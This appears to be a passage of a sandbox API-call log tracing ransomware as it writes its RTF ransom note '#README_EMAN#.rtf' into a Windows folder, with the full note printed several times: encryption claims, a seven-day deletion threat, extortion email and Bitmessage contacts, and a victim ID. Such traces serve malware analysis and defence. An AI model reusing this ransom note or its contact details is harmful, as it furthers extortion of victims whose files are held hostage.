}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.088] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.088] CloseHandle (hObject=0x294) returned 1 [0269.088] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.088] GetLastError () returned 0x2 [0269.089] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 